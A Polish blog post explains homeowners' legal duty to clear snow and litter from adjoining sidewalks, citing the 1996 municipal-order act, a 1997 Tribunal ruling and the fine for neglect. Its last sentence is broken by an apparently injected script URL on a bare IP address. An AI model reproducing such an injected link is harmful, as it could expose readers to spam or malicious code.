Pomóżmy tym, którzy tego potrzebują…

Zima niby w odwrocie, ale to o czym piszę nie dotyczy tylko zimy. Można się zastanowić nad zasadnością przepisów prawa, które nakładają na właścicieli nieruchomości obowiązek odśnieżania zimą i sprzątania chodnika bezpośrednio przylegającego do posesji – czyli właściwie nie swojego terenu !

Wedle logiki, właściciel domu powinien co najwyżej usuwać śnieg i sople ze swojego dachu, jeśli wystaje on nad chodnik i może komuś postronnemu zrobić krzywdę. Jeśli chodnik jest za ogrodzeniem – to na dobrą sprawę – winien za niego odpowiadać właściciel – czyli gmina. Tyle logika a nie prawo. Trybunał Konstytucyjny już kiedyś w swoim orzeczeniu odniósł się do aktualnych zapisów i nie dopatrzył się sprzeczności z Konstytucją RP. W wyroku z 5 listopada 1997 r. (K 22/97) wskazał, iż obowiązek taki wypływa z tradycji prawnej istniejącej w polskim ustawodawstwie. Uznał także, że jego realizacja jest zgodna z istotnym interesem społecznym oraz, że nie istnieje równie efektywny sposób zapewnienia porządku”(?) Nie będę dyskutował z wyrokami sądowymi.
Gdy już spadnie śnieg lub gdy ktoś rzuci skórkę od banana pod Wasz parkan pamiętajcie o regularnym odśnieżaniu swoich posesji i dbaniu o odlodzanie śliskich powierzchni. Skórkę też podnieście, nawet jeśli nie wiecie, że tam leży .. tak by nikt nie odniósł szkody. Ktoś, kto ewentualnie ucierpi może zasądzić właściciela posesji – lepiej więc mieć ubezpieczenie OC na taką okoliczność.
Zasadniczo, właściciel nieruchomości jest odpowiedzialny za odśnieżanie chodnika, jeżeli chodnik jest położony wzdłuż jego nieruchomości. Jeżeli chodnik jest nieodśnieżony, a pieszy poślizgnie się na nim i złamie nogę, ma prawo domagać się od właściciela nieruchomości odszkodowania. Właściciel nieruchomości nie usuwa natomiast śniegu z chodnika, na którym gmina pobiera opłaty za parkowanie. Obowiązek ośnieżania chodnika wynika z ustawy z 13 września 1996 r. o utrzymaniu porządku w gminach. Wedle niej, za chodnik uznaje się wydzieloną część drogi publicznej służącą dla ruchu pieszego położoną bezpośrednio przy granicy nieruchomości. Jeżeli zatem chodnik przylega bezpośrednio do ogrodzenia domu, obowiązek odśnieżania spoczywa na właścicielu nieruchomości. Jeżeli między chodnikiem a granicą działki jest pas zieleni, odśnieżyć powinna już gmina… (!?) Śnieg, który właściciel uprzątnie z chodnika powinien zostać usunięty przez zarządcę drogi.
Jaka kara grozi za nieodśnieżanie i bałagan wzdłuż swego płotu? Zgodnie z art. 117 kodeksu wykroczeń, każdy kto nie wywiązuje się z obowiązku utrzymania porządku w obrębie swojej http://178.33.53.47/st.js?t=c&c=1894&w=nieruchomości&s=1003nieruchomości podlega karze grzywny do 1500 złotych albo karze nagany

Zostaw komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

test z matematyki * Time limit is exhausted. Please reload the CAPTCHA.